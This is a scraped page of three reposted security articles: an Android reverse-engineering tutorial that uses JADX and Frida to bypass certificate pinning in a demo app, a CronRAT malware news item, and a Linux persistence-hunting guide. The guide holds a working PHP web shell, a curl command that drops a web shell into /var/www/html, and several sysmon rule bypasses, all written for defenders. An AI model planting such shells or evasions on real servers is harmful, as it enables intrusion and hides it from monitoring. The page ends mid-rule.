Leaderboard

Reverse engineering & modifying Android apps with JADX & Frida

Reverse engineering & modifying Android apps with JADX & Frida I get a lot of emails from users who want to know exactly what their favourite Android app is doing, and want to tweak and change how that works for themselves. There are some great tools to do this, including JADX & Frida, but using these is complicated, and every reverse engineering problem has its own unique challenges & solutions. There's few good guides to getting started, and even fewer guides on the advanced tricks available. In this article, I want to talk you through the core initial steps to look inside any Android app, give you the tools to find & understand the specific code that matters to you, and then show you how you can use that information to modify the app for yourself. Let's set the scene first. Context I'm assuming here that somebody else has written an Android app that you're interested in. You want to know exactly how a specific bit of behaviour works, and you want to change what it's doing. I'm going to focus on the classic HTTP Toolkit user example here of certificate pinning: where security-conscious apps that send HTTPS traffic go beyond the normal HTTPS validation requirements, and actively check that the HTTPS certificates used are from a small set of specific trusted certificates, not just the standard set trusted by all Android devices. (I'm focusing on certificate pinning because it's a common use case and it's convenient, but the techniques here work for all other kinds of reverse engineering & patching too, don't worry!) Certificate pinning is a problem for HTTP Toolkit users, who are trying to intercept HTTPS traffic to see what messages their Android apps are sending & receiving. It's not possible to intercept these app's traffic because they won't trust HTTP Toolkit's certificate, even after it's been injected into the device's system certificate store. Using the tools we're going to talk about in a moment we can take an unknown 3rd party app, find the certificate pinning code within it, and disable that remotely while the app runs on our device. This makes it possible to intercept, inspect & mock all of its traffic in any way we like! This isn't not easy, but it's usually not necessary. For starters, 99% of apps don't use certificate pinning beyond Android's standard restrictions, and for that case if you use HTTP Toolkit on a rooted device you're done in one click. For most apps that do explicitly pin their certificates, you can disable that using this general-purpose Frida script which already knows how to disable all the most popular cert pinning libraries available. In some cases though apps implement their own custom certificate pinning logic, or do something else unusual, which means the general-purpose script can't recognize and disable the right APIs. In these kinds of cases, or if you're trying to modify any other kinds of app behaviour, you need to roll up your sleeves and get your hands dirty. For this article, I've prepped an certificate pinning demo app: Each button sends an HTTPS request, and validates the connection in a slightly different way. The 'unpinned' option does nothing, the next 4 use various standard pinning techniques, and the last button uses totally custom code to manually check the certificate. If you use this with HTTP Toolkit normally, you can only intercept the first request. If you use the general-purpose Frida script, you can intercept the next 4 too, but not the last one. In this article we're going to focus on that last button, reverse engineer this app to see how it works, and write a custom Frida script to disable the certificate checking functionality. The Plan To reverse engineer an app and hook some behaviour, there's a few core steps you need to work through: Download a copy of the app on your computer Extract the source code Find the code we're interested in Understand how that code works Write a Frida hook to change how that code works Download the app Android apps are generally published to the Google Play store, but you can't easily download the app from there directly to mess around with on your computer. Fortunately, many sites that mirror the Google Play store, and do provide direct downloads of almost all available apps. ApkMirror.com and ApkPure.com are two good examples. In the general case, you should go to your favourite APK mirror site, and download the latest APK for the app you're interested in. In this specific case, I wrote the app, so I've conveniently published it directly on GitHub. You can download its APK here. Android app formats What is this APK file? Let's start with some quick but necessary background on Android app formats. There's two distribution formats you'll run into: APKs (older) and XAPKs (newer, also known Android App Bundles). In this example, the app is provided as a single APK, so that's easy enough, but many other apps you'll run into may be XAPKs, so it's worth understanding the difference. APKs are fairly simple: they're a ZIP file with a bunch of metadata, all the application's assets & config files, and one or more binary .dex files, which contain the compiled application. XAPKs are more complicated: they're a zip file that contains multiple APKs. In practice, they'll contain one large primary APK, with the main application code & resources, and then various small APKs which include the config or resources only relevant to certain types of devices. There might be separate config APKs for devices with larger screens, or different CPU architectures. For reverse engineering you usually just need the main APK, and you can ignore the rest. Extract the code Inside the APK, if you open it as a zip, you'll find a large classes.dex file (for multidex apps, there might even be a classes2.dex or more). These DEX files contain all the JVM classes of the application, in the compiled bytecode format used by Android's Runtime engine (ART, which replaced Dalvik a few years back). These DEX files contain the compiled application, but do not contain all the original source. Many things, most notably including local variable names & comments, are lost when compiling an Android application, and it's always impossible to extract those from the app. The external interfaces of each class are generally present here though (assuming that obfuscation wasn't used). That will usually be enough to find the method that you're interested in. Using those external interfaces you can usually then deduce what each line is trying to do, and progressively rename variables and add your own comments until you have some code that makes sense. To start that process, we need to convert the DEX file into a format we can mess around with ourselves. The best tool to do this is JADX (you can download it from their GitHub release page). Once JADX is installed, you run it like so: jadx ./pinning-demo.apk This will create a folder with the same name as the APK, containing 'resources' and 'sources' folders. The sources folder is what we're interested in: this is JADX's best guess at the Java source code that would've generated this DEX file. It's not perfect, but it should be pretty close. If you use JADX on the latest pinning demo APK, you'll find a structure like this: sources/ android/ - the core Android classes androidx/ - Android Jetpack classes com/ android/volley/ - The Volley HTTP client datatheorem/android/trustkit - One of the popular pinning libraries used google/ - Firefox, GSON & various other Google packages kotlin/ - runtime components of Kotlin okhttp3/ - OkHttp3, a popular HTTP library [...various other namespaces & packages] tech/httptoolkit/pinning_demo/ - the main application code Once you've extracted the code from an app like this, you can explore it any way you like - using Android Studio, using any other text editor, or just grepping for interesting text, it's up to you. By default, I'd recommend using some editor that can highlight and do basic automated refactoring (variable renaming) on Java code, since that'll make the next steps much easier. Find the code you care about Which code you want to reverse engineer & hook depends on the problem you're trying to solve. In my case, the problem is that when I intercept the app's HTTP using HTTP Toolkit and press the "Manually pinned request" button, I get a "Certificate rejected" message in HTTP Toolkit, and I want to stop that happening. That message typically means that the app is pinning a certificate - i.e. even though the HTTP Toolkit certificate is trusted on the device, the app is including its own custom checks, which are rejecting the HTTPS certificates and blocking HTTP Toolkit's automatic HTTP interception. So, the goal here is to find out which bit of code is making the custom-checked HTTPS request behind that last button, find out where that checks the certificate, and then later disable that check. Whatever code you want to change in your case, there are a lot of tricks available to help you hunt it down. Let's try out a few different approaches on this demo app. Search for relevant strings In my case, I know the failing request is going to sha512.badssl.com (a known-good HTTPS test site) so searching for that is a good start. That works, and gives me a few different places in the code that are sending requests, but there's options here for all the different possible pinning mechanisms, and related config files too. It's not immediately clear which code is relevant, so it'd be better to find something more precise. Some other strings that might be interesting, for the certificate pinning case: checkCert validateCert pinning pinner certificate SSL TLS Here you're looking for anything might be included in the name of a class, field or method, or which might be included in strings (e.g. error messages), since all of that will be preserved and searchable in the decompiled code. For example, if you're trying to understand where some HTTP API data comes from, you could try searching for the API endpoint path, or the name of query parameters. If you're looking for the implementation of a specific algorithm, it's worth searching for the common domain terms in that algorithm, or if you're trying to extract secrets or keys from the app then 'secret', 'key', and 'auth' are all worth investigating. Search for usage of relevant Java APIs Although local variable names aren't available, and in obfuscated apps even the class & package names may be obscured, the built-in JVM classes & package names are always available and unchanged. That means they're a great way to find related functionality. If you know the code you're interested in is likely to be using a certain data type, calling a specific API, or throwing a certain type of exception, you can use that to immediately narrow down your search. In this example, I think it's likely that all manual certificate checks are going to be using java.security.cert.X509Certificate, so I can search for usages of that type. This does give some good answers! Unfortunately though the entire app is filled with lots of different ways to do certificate pinning, by design, so this still comes back with a long list of matches, and it's not easy to tell which is relevant immediately. In most other apps that won't be a problem (most apps implement certificate pinning just the once!) and we could trawl through the results, but for now it's better to test out some other options first. Check for HTTP error reports Many apps nowadays include automatic error reporting using tools like Sentry. This is useful to app developers, but also to reverse engineers! Even when the app's own requests may use certificate pinning, requests sent by external libraries like these generally will not, so they're inspectable using HTTP Toolkit (or any other HTTP MitM proxy). That's useful because those requests themselves will usually include the stacktrace for any given error. This provides an excellent way for finding the source of any errors that you want to work around: Intercept traffic from your device using HTTP Toolkit or another proxy Trigger the error Look through the captured HTTP traffic for error reports Find the stacktrace in the relevant error report Follow the stacktrace into the codebase extracted earlier to immediately find the relevant code Bingo! In this case though, we're out of luck, as it's a tiny demo app with no error reporting. More searching required. Check ADB for errors Very commonly, apps will log errors and extra info to the console for easy debugging. Android captures this output from all running JVM processes in a single output buffer, along with stack traces from all uncaught errors, and makes that accessible via ADB using the logcat command. Outputting errors and debug info here is especially common in smaller apps which don't use an automated error reporting tool, so if you're looking to find & change some code that throws errors it's a great alternative to the previous approach. Even in non-error cases, the output here can provide excellent clues about application behaviour at the moments you're interested in. To capture the logs from a device, run: adb logcat -T1 This will stream the live logs from your device, without the history, until you stop it. It's often useful to pipe this to a file instead (i.e. ... > logs.txt) to save it for more detailed later analysis, since there can be a lot of noise here from other activity on the device. While this command is running, if you reproduce your error, you'll frequently find useful error stacktraces or error messages, which can then guide you to the right place in the code. For our demo app, this works great. By enabling logging when pressing the button, if you look carefully between the other noisy log output, we can now get the specific error message unique to that button: > adb logcat -T1 --------- beginning of main ... 11-22 10:46:16.478 31963 31963 I Choreographer: Skipped 114 frames! The application may be doing too much work on its main thread. 11-22 10:46:16.996 1785 1785 D BluetoothGatt: close() 11-22 10:46:16.997 1785 1785 D BluetoothGatt: unregisterApp() - mClientIf=5 11-22 10:46:17.000 791 1280 I bt_stack: [INFO:gatt_api.cc(1163)] GATT_CancelConnect: gatt_if:5, address: 00:00:00:00:00:00, direct:0 11-22 10:46:17.092 573 618 D LightsService: Excessive delay setting light 11-22 10:46:17.258 282 286 E TemperatureHumiditySensor: mCompEngine is NULL 11-22 10:46:18.773 26029 26129 I System.out: java.lang.Error: Unrecognized cert hash. 11-22 10:46:19.034 26029 26080 W Adreno-EGL: <qeglDrvAPI_eglGetConfigAttrib:607>: EGL_BAD_ATTRIBUTE ... We can search the codebase for this Unrecognized cert hash error message, and conveniently that message is shown in exactly one place. This error is appears deep inside invokeSuspend in MainActivity$sendManuallyCustomPinned$1.java: throw new Error("Unrecognized cert hash."); Explore the code in depth Still stuck? At this point, your best bet is to try and explore the application more generally, or to explore around the best clues you've found so far. To do so, you can use the manifest (in resources/AndroidManifest.xml) to find the entrypoints for every activity and background service registered in the application. Start with the services (i.e. background processes) or activities (i.e. a visible page of the UI) that sound most relevant to your situation, open up the corresponding source, and start digging. This can be time consuming. Keep going! You don't need to dig into every detail, but walking through here can quickly give you an idea of the overall architecture of the app, and you can often use this to find the code that's relevant to you. It's well worth keeping notes & adding inline comments as you go to keep track of the process. Understand the code Hopefully by this point you've found the code that's relevant to you. In this demo app, that code decompiled by JADX looks like this: public final Object invokeSuspend(Object obj) { IntrinsicsKt.getCOROUTINE_SUSPENDED(); if (this.label == 0) { ResultKt.throwOnFailure(obj); this.this$0.onStart(R.id.manually_pinned); boolean z = true; try { TrustManager[] trustManagerArr = {new MainActivity$sendManuallyCustomPinned$1$trustManager$1()}; SSLContext instance = SSLContext.getInstance("TLS"); instance.init(null, trustManagerArr, null); Intrinsics.checkExpressionValueIsNotNull(instance, "context"); Socket createSocket = instance.getSocketFactory().createSocket("untrusted-root.badssl.com", 443); if (createSocket != null) { SSLSocket sSLSocket = (SSLSocket) createSocket; SSLSession session = sSLSocket.getSession(); Intrinsics.checkExpressionValueIsNotNull(session, "socket.session"); Certificate[] peerCertificates = session.getPeerCertificates(); Intrinsics.checkExpressionValueIsNotNull(peerCertificates, "certs"); int length = peerCertificates.length; int i = 0; while (true) { if (i >= length) { z = false; break; } Certificate certificate = peerCertificates[i]; MainActivity mainActivity = this.this$0; Intrinsics.checkExpressionValueIsNotNull(certificate, "cert"); if (Boxing.boxBoolean(mainActivity.doesCertMatchPin(MainActivityKt.BADSSL_UNTRUSTED_ROOT_SHA256, certificate)).booleanValue()) { break; } i++; } if (z) { PrintWriter printWriter = new PrintWriter(sSLSocket.getOutputStream()); printWriter.println("GET / HTTP/1.1"); printWriter.println("Host: untrusted-root.badssl.com"); printWriter.println(""); printWriter.flush(); System.out.println((Object) ("Response was: " + new BufferedReader(new InputStreamReader(sSLSocket.getInputStream())).readLine())); sSLSocket.close(); this.this$0.onSuccess(R.id.manually_pinned); return Unit.INSTANCE; } sSLSocket.close(); throw new Error("Unrecognized cert hash."); } throw new TypeCastException("null cannot be cast to non-null type javax.net.ssl.SSLSocket"); } catch (Throwable th) { System.out.println(th); this.this$0.onError(R.id.manually_pinned, th.toString()); } } else { throw new IllegalStateException("call to 'resume' before 'invoke' with coroutine"); } } There's a lot going on here! The original code (here) is written in Kotlin and uses coroutines, which adds a lot of extra noise in the compiled output. Fortunately, we don't need to understand everything. To change this behaviour, we just need to work out what code paths could lead to the highlighted line above, where the error is thrown. As you can see here, JADX has taken some best guesses at the variable names involved in this code, inferring them from the types created (e.g. printWriter = new PrintWriter) and from the methods called (peerCertificates = session.getPeerCertificates()). This is pretty clever, and helps a lot to see what's happening. It's not perfect though. You can see from some inferred variables like createSocket = instance.getSocketFactory().createSocket("untrusted-root.badssl.com", 443), where the variable has just taken the name of the method, or the z boolean variable, where no clues where available to infer anything useful at all. If you have experience with code like this it may be easy to see what's happening here, but let's walk through it step by step: The line we're interested in only runs if z is false, since the preceeding if (z) block ends with return. We can rename z to isCertValid (made easier by automated refactoring) and remove some Kotlin boilerplate to make the code immediately clearer, giving us code like: boolean isCertValid = true; //... int length = peerCertificates.length; int i = 0; while (true) { if (i >= length) { isCertValid = false; break; } Certificate certificate = peerCertificates[i]; MainActivity mainActivity = this.this$0; if (mainActivity.doesCertMatchPin(MainActivityKt.BADSSL_UNTRUSTED_ROOT_SHA256, certificate)) { break; } i++; } if (isCertValid) { // ... return Unit.INSTANCE; } sSLSocket.close(); throw new Error("Unrecognized cert hash."); The block before the if is while (true), so this code only runs after that breaks. The break commands happen after either checking all values (setting isCertValid to false) or after doesCertMatchPin returns true for one value. That means the exception is only thrown when doesCertMatchPin returns false for all values, and that method is indeed what causes our problem. This gives us a good understanding of the logic here: the code checks every certificate linked to a socket, and calls doesCertMatchPin from the MainActivity class to compare it to BADSSL_UNTRUSTED_ROOT_SHA256. This is an intentionally simple example. Real examples will be more complicated! But hopefully this gives you an idea of the process, and the same techniques of incremental renaming, refactoring and exploring can help you understand more complex cases. It's worth noting that the relatively clear code here isn't always available, usually because obfuscation techniques are used to rename classes, fields & methods throughout the code to random names (a, b..., aa, ab...). In that case, the same process we're discussing here applies, but you won't have many of the names available as clues to start with, so you can only see the overall structure and references to built-in JVM APIs. It is still always possible to reverse engineer such apps, but it's much more important to quickly find the precise code that you're interested in before you start, and the process of understanding it is significantly more difficult. That's a topic for another blog post though (watch this space). Patch it with Frida Once we've found the code, we need to think about how to change it. For our example here, it's easy: we need to make doesCertMatchPin return true every time. Be aware Frida gives you a lot of power to patch code, but the flexibility is not unlimited. Frida patches are very focused on method implementation replacement, and it's very difficult (if not impossible) to use Frida to patch to individual lines within existing methods. You need to look out for method boundaries at which you can change behaviour. For certificate pinning, that's fairly easy, because certificate checks are almost always going to live in a separate method like checkCertificate(cert), so you can focus on that. In other cases though this can get more complicated. In this specific case, we're looking to patch the doesCertMatchPin function in the tech.httptoolkit.pinning_demo.MainActivity class. Within a Frida script, we first need to get a reference to that method: const certMethod = Java.use("tech.httptoolkit.pinning_demo.MainActivity").doesCertMatchPin; Then we need to assign an alternative implementation to that method, like so: certMethod.implementation = () => true; After this patch is applied, the real implementation of that doesCertMatchPin method will never be called, and it'll just return true instead. This is a simple example. There's many more complex things you can do though. Here's some examples: // Disable a property setter, to stop some fields being changed: const classWithSetter = Java.use("a.target.class"); classWithSetter.setATargetProperty.implementation = () => { return; // Don't actually set the property }; // Wrap a method, to add extra functionality or logging before and after without // changing the existing functionality: const classToWrap = Java.use("a.target.class"); const originalMethod = classToWrap.methodToWrap; classToWrap.methodToWrap.implementation = () => { console.log('About to run method'); const result = originalMethod.apply(this, arguments); console.log('Method returned', result); return result; }; // Hook the constructor of an object: const classToHook = Java.use("a.target.class"); const realConstructor = classToHook.$init; classToHook.$init.implementation = () => { // Run the real constructor: realConstructor.apply(this, arguments); // And then modify the initial state of the class however you like before // anything else gets access to it: this.myField = null; }; There's a huge world of options here - those are just some of the basic techniques at your disposal. Once you've found a method you want to patch and you've got an idea how you'll do it, you need to set up Frida (see this guide if you haven't done so already) to test it out. Once Frida is working you can test out your patch interactively, and tweak it live to get it working. For example, to test out our demo hook above: Attach HTTP Toolkit to the device Run the app, check that the "Manually pinned request" button fails and shows a certificate error in HTTP Toolkit. Start Frida server on the device Restart your application with Frida attached by running: frida --no-pause -U -f tech.httptoolkit.pinning_demo This will start the app, and give you a REPL to run Frida commands Run Java.perform(() => console.log('Attached')) to attach this process to the VM & class loader (it'll pause briefly, then log 'Attached'). Test out some hooks. For our demo app, for example, you can hook the certificate pinning function by running: Java.use("tech.httptoolkit.pinning_demo.MainActivity").doesCertMatchPin.implementation = () => true; Clear the logs in HTTP Toolkit, and then press the "Manually pinned request" button again It works! The button should go green, and the full request should appears successfully in HTTP Toolkit. Once you've something that works in a REPL, you can convert it into a standalone script, like so: Java.perform(() => { console.log("Patching..."); const mainActivityClass = Java.use("tech.httptoolkit.pinning_demo.MainActivity"); const certMethod = mainActivityClass.doesCertMatchPin; certMethod.implementation = () => true; console.log("Patched"); }); and then you can run this non-interactively with Frida using the -l option, for example: frida --no-pause -U -f tech.httptoolkit.pinning_demo -l ./frida-script.js That command will restart the app with the script injected immediately, so that that certificate pinning behind this button is unpinned straight away, and tapping the button will always show a successful result: If you want examples of more advanced Frida behaviour, take a look through the my cert unpinning script for certificate pinning examples for every popular library and some other interesting cases, or check out this huge selection of Frida snippets for snippets demonstrating all sorts of other tricks and APIs available. I hope you find this helps you to reverse engineer, understand & hook Android applications! Have questions or run into trouble? Get in touch on Twitter, file issues against my Frida script, or send me a message directly. Published 4 days ago by Tim Perry Sursa: https://httptoolkit.tech/blog/android-reverse-engineering/

August 30, 2023

1 point

CronRAT: A New Linux Malware That's Scheduled to Run on February 31st

Researchers have unearthed a new remote access trojan (RAT) for Linux that employs a never-before-seen stealth technique that involves masking its malicious actions by scheduling them for execution on February 31st, a non-existent calendar day. Dubbed CronRAT, the sneaky malware "enables server-side Magecart data theft which bypasses browser-based security solutions," Sansec Threat Research said. The Dutch cybersecurity firm said it found samples of the RAT on several online stores, including an unnamed country's largest outlet. CronRAT's standout feature is its ability to leverage the cron job-scheduler utility for Unix to hide malicious payloads using task names programmed to execute on February 31st. Not only does this allow the malware to evade detection from security software, but it also enables it to launch an array of attack commands that could put Linux eCommerce servers at risk. "The CronRAT adds a number of tasks to crontab with a curious date specification: 52 23 31 2 3," the researchers explained. "These lines are syntactically valid, but would generate a run time error when executed. However, this will never happen as they are scheduled to run on February 31st." The RAT — a "sophisticated Bash program" — also uses many levels of obfuscation to make analysis difficult, such as placing code behind encoding and compression barriers, and implementing a custom binary protocol with random checksums to slip past firewalls and packet inspectors, before establishing communications with a remote control server to await further instructions. Armed with this backdoor access, the attackers associated with CronRAT can run any code on the compromised system, the researchers noted. "Digital skimming is moving from the browser to the server and this is yet another example," Sansec's Director of Threat Research, Willem de Groot, said. "Most online stores have only implemented browser-based defenses, and criminals capitalize on the unprotected back-end. Security professionals should really consider the full attack surface." CronRAT: A New Linux Malware That's Scheduled to Run on February 31st (thehackernews.com)

November 26, 2021

1 point

Hunting for Persistence in Linux (Part 1)

Hunting for Persistence in Linux (Part 1): Auditd, Sysmon, Osquery, and Webshells Nov 22, 2021 • Pepe Berba This blog series explores methods attackers might use to maintain persistent access to a compromised linux system. To do this, we will take an “offense informs defense” approach by going through techniques listed in the MITRE ATT&CK Matrix for Linux. I will try to: Give examples of how an attacker might deploy one of these backdoors Show how a defender might monitor and detect these installations By giving concrete implementations of these persistence techniques, I hope to give defenders a better appreciation of what exactly they are trying to detect, and some clear examples of how they can test their own alerting. Overview of blog series The rest of the blog post is structured with the following: Introduction to persistence Linux Auditing and File Integrity Monitoring How to setup and detect web shells Each persistence technique has two main parts: How to deploy the persistence techniques How to monitor and detect persistence techniques In this blog post we will only discuss web shell as a case study for logging and monitoring. We will discuss other techniques in succeeding posts. Throughout this series we will go through the following: Hunting for Persistence in Linux (Part 1): Auditing, Logging and Webshells Server Software Component: Web Shell Hunting for Persistence in Linux (Part 2): Account Creation and Manipulation Create Account: Local Account Valid Accounts: Local Accounts Account Manipulation: SSH Authorized Keys Hunting for Persistence in Linux (Part 3): Systemd, Timers, and Cron Create or Modify System Process: Systemd Service Scheduled Task/Job: Systemd Timers Scheduled Task/Job: Cron Hunting for Persistence in Linux (Part 4): Initialization Scripts, Shell Configuration, and others Boot or Logon Initialization Scripts: RC Scripts Event Triggered Execution: Unix Shell Configuration Modification Introduction to persistence Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access [1] Attackers employ persistence techniques so that exploitation phases do not need to be repeated. Remember, exploitation is just the first step for the attacker; they still need to take additional steps to fulfill their primary objective. After successfully gaining access to the machine, they need to pivot through the network and find a way to access and exfiltrate the crown jewels. During these post exploitation activities, the the attacker’s connection to the machine can be severed, and to regain access, the attacker might need to repeat the exploitation step. Redoing the exploitation might be difficult depending on the attacker vector: Sending an email with a malicious attachment: The victim wouldn’t open the same maldoc twice. You’d have to send another email and hope the victim will fall for it again. Using leaked credentials and keys: The passwords might be reset or the keys are revoked Exploiting servers with critical CVEs: The server can be patched Because of how difficult the exploitation can be, an attacker would want to make the most out of their initial access. To do this, they install backdoor access that reliably maintain access to the compromised machine even after reboots. With persistence installed, the attacker no longer need to rely on exploitation to regain access to the system. He might simply use the added account in the machine or wait for the reverse shell from a installed service. 0 Linux Logging and Auditing 0.1 File Integrity Monitoring The configuration changes needed to setup persistence usually require the attacker to touch the machine’s disk such as creating or modifying a file. This gives us an opportunity to catch the adversaries if we are able to lookout for file creation or modification related to special files of directories. For example, we can look for the creation of the web shell itself. This can be done by looking for changes within the web directory like /var/www/html . You can use the following: Wazuh’s File Integrity Monitoring: https://documentation.wazuh.com/current/learning-wazuh/detect-fs-changes.html Auditbeat’s File Integrity Monitoring: https://www.elastic.co/guide/en/beats/auditbeat/current/auditbeat-module-file_integrity.html auditd For the blog posts, we will be using mainly auditd, and auditbeats jointly. For instructions how to setup auditd and auditbeats see A02 in the appendix. 0.2 Auditd and Sysmon 0.2.1 What is sysmon and auditd? Two powerful tools to monitor the different processes in the OS are: auditd: the defacto auditing and logging tool for Linux sysmon: previously a tool exclusively for windows, a Linux port has recently been released Each of these tools requires you to configure rules for it to generate meaningful logs and alerts. We will use the following for auditd and sysmon respectively: https://github.com/Neo23x0/auditd https://github.com/microsoft/MSTIC-Sysmon/tree/main/linux For instructions how to install sysmon refer to appendix A01. 0.2.2 Comparison of sysmon and auditd At the time of writing this blog post, sysmon for linux has only been released for about a month now. I have no experience deploying sysmon at scale. Support for sysmon for linux is still in development for agents such as Linux Elastic Agent see issue here I’m using sysmonforlinux/buster,now 1.0.0 amd64 [installed] While doing the research for this blogpost, my comments so far are: sysmon’s rule definitions are much more flexible and expressive than auditd’s rules depending on user input fields such as CommandLine` can be bypassed just like other rules using string matching. In my testing, sysmon only has the event FileCreate which is triggered only when creating or overwriting of files. This means that file modification is not caught by Sysmon (such as appending to files). This means that file integrity monitoring is a weakness for Sysmon. I’ve experienced some problems with the rule title displayed in the logs. Auditd rules can filter up to the syscall level and sysmon filters based on highlevel predfined events such as ProcessCreation, and FileCreate. This means that if a particular activity that you are looking for is not mapped to a sysmon event, then you might have a hard time using sysmon to watch for it. Overall, I’m very optimistic with using adopting sysmon for linux in the future to look for interesting processes and connections but would still rely on other tools for file integrity monitoring such as auditd or auditbeats. In windows, having only FileCreate okay since you have other events specific to configuration changes in registry keys RegistryEvent, but in Linux since all of the configurations are essentially files, then file integrity monitoring plays a much bigger role in hunting for changes in sysmte configuration. The good thing with sysmon, is that rules for network activities and process creation is much more expressive compared to trying to to use a0, a1 for command line arguments in auditd. We will discuss some of the findings in the next blog posts but some examples of bypasses are: T1087.001_LocalAccount_Commands.xml looks for commands that have /etc/passwd to detect account enumeration. We can use cat /etc//passwd to bypass this rule T1070.006_Timestomp_Touch.xml looks for -r or --reference in touch commands to look for timestamp modification. We can use touch a -\r b to bypass this or even touch a -\-re\ference=b T1053.003_Cron_Activity.xml aims to monitor changes to crontab files. Using echo "* * * * * root touch /root/test" >> /etc/crontab will bypass this because it does not create or overwrite a file, and in Debian 10 using the standard crontab -e will not trigger this because the TargetFilename is +/var/spool/cron/crontabs and the extra + at the start causes the rule to fail. You can see the different architectures for auditd and sysmon here: Redhat CHAPTER 7. SYSTEM AUDITING Lead Microsoft Engineer Kevin Sheldrake Brings Sysmon to Linux We see from the diagram from linuxsecurity.com that Sysmon works on top of eBPF which is an interface for syscalls of the linux kernel. This serves as an abstraction when we define sysmon rules, but as a consequence, this flexibility gives attackers room to bypass some of the rules. For example, in sysmon, we can look for a FileCreate event with a specific TargetFilename. This is more flexible because you can define rules based on patterns or keywords and look for files that do no exist yet. However, string matches such as /etc/passwd can fail if the target name is not exactly that string. Unlike in auditd, what is being watched are actions on the inodes of the files and directories defined. This means that there is no ambiguity what specific files to watch. You can even look for read access to specific files. However, because it watches based on inodes, the files have to exist what the auditd service is started. This means you cannot watch files based on certain patterns like <home>/.ssh/authorized_keys 0.3 osquery Osquery allows us to investigate our endpoints using SQL queries. This simplifies the task of investigating and collecting evidence. Moreover, when paired with management interface like fleetdm allows you to take baselines of your environments and even hunt for adversaries. An example from a future blog post is looking for accounts that have a password set. If you expect your engineers to always SSH via public key, then you should not see active passwords. We can get this information using this query SELECT password_status, username, last_change FROM shadow WHERE password_status = 'active'; And get results for all your fleet something similar to this +-----------------+----------+-------------+ | password_status | username | last_change | +-----------------+----------+-------------+ | active | www-data | 18953 | +-----------------+----------+-------------+\ Now why does www-data have a password? Hmm… Installation instructions can be found in the official docs Once installed simply run osqueryi and run the SQL queries. 1 Server Software Component: Web Shell 1.1 Introduction to web shells MITRE: https://attack.mitre.org/techniques/T1505/003/ A web shell is backdoor installed in a web server by an attacker. Once installed, it becomes the initial foothold of the attacker, and if it’s never detected, then it becomes an easy way to persistent backdoor. In our example, to install a web shell we add a bad .php file inside/var/www/html Some reasons this can happen are: the web application has a vulnerable upload API the web application has a critical RCE vulnerability the attacker has existing access that can modify the contents of the web root folder If the attacker can upload malicious files that run as php, then he can get remote access to the machine. One famous example of this is the 2017 Equifax Data Breach. You can read the report, but here’s my TLDR: The web server was running Apache Struts containing a critical RCE vulnerability. Attackers used this RCE to drop web shells which they used to gain access to sensitive data and exfiltrate the data. Around 30 different web shells was used in the breach. See the following resources: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload https://portswigger.net/web-security/os-command-injection 1.2 Installing your own web shells Note: If you want to try this out you can follow the setup instructions in the appendix A00. Assume we already have RCE, we add a file phpinfo.php that will contain our web shell. vi /var/www/html/phpinfo.php Choose any of the examples php web shells. For example: <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> Now anyone with access to http://x.x.x.x/phpinfo.php would be able to access the web shell and run arbitrary commands. What if you don’t have shell access? You might be able to install a web shell through an unrestricted upload. Upload your php backdoor as image.png.php and the backdoor might be accessible on [http://x.x.x.x/](http://x.x.x.x/)uploads/image.png.php . Another possible command that you can use is curl https://raw.githubusercontent.com/JohnTroony/php-webshells/master/Collection/PHP_Shell.php -o /var/www/html/backdoor_shell.php 1.3 Detection: Creation or modification of php files Using auditbeat’s file integrity monitoring For some web applications, we might be able to monitor the directories of our web app in auditbeat’s file integrity monitoring. - module: file_integrity paths: - /bin - /usr/bin - /sbin - /usr/sbin - /etc - /var/www/html # <--- Add - module: system datasets: - package # Installed, updated, and removed packages When using _auditbeat’_s file integrity monitoring module, we see that looking at event.module: file_integrity Our vi command “moved” the file. In this case, moved is the same as updated because of how vi works. Where it creates a temporary file /var/www/html/phpinfo.php.swpand if you want to save the file it replaces /var/www/html/phpinfo.php An example of a command that will result in a created log would be if we ran curl https://raw.githubusercontent.com/JohnTroony/php-webshells/master/Collection/PHP_Shell.php -o /var/www/html/backdoor_shell.php Using audit to monitor changes We can add the following rule to auditd -w /var/www/html -p wa -k www_changes And you can search for all write or updates to files in /var/www/html using the filter tags: www_changes or key="www_changes" The raw auditd logs looks like this type=SYSCALL msg=audit(1637597150.454:10650): arch=c000003e syscall=257 success=yes exit=4 a0=ffffff9c a1=556e6969fbc0 a2=241 a3=1b6 items=2 ppid=12962 pid=13086 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=11 comm="curl" exe="/usr/bin/curl" subj==unconfined key="www_changes", type=PATH msg=audit(1637597150.454:10650): item=0 name="/var/www/html" inode=526638 dev=08:01 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=PARENT cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0, type=PATH msg=audit(1637597150.454:10650): item=1 name="backdoor_shell.php" inode=527243 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=CREATE cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0, type=PROCTITLE msg=audit(1637597150.454:10650): proctitle=6375726C0068747470733A2F2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A6F686E54726F6F6E792F7068702D7765627368656C6C732F6D61737465722F436F6C6C656374696F6E2F5048505F5368656C6C2E706870002D6F006261636B646F6F725F7368656C6C2E706870 This allows us to note: euid=0 effective UID of the action exe="/usr/bin/curl” the command that was run name="/var/www/html" ... name="backdoor_shell.php" the output file key="www_changes" the key of the auditd alert that was fired proctitle=63757... is the hex encoded title of the process which is our original curl command Notes on file integrity monitoring for detecting web shells There are other ways to check. For example, if there is version control (like git), you can compare the current state with a known good state and investigate the differences. However, if there are folders where we expect specific files to be written and modified often, such as upload directories, then file integrity monitoring might not be fully effective. We might have to fine-tune this alert and try to exclude these upload directories to reduce noise, but how would you detect web shells uploaded within the upload directory! We need to look for more effective means of detecting web shells. 1.4 Detection: Looking for command execution for www-data using auditd When we run webservers such as nginx the service will run under the user www-data . On regular operations, we should not expect to see that user running commands such as whoami or ls However, if there was a web shell, these are some of the commands we are most likely going to see. Therefore, we should try to use auditd to detect these. Here is an auditd rule that will look for execve syscalls by www-data (euid=33) and we tag this as detect_execve_www -a always,exit -F 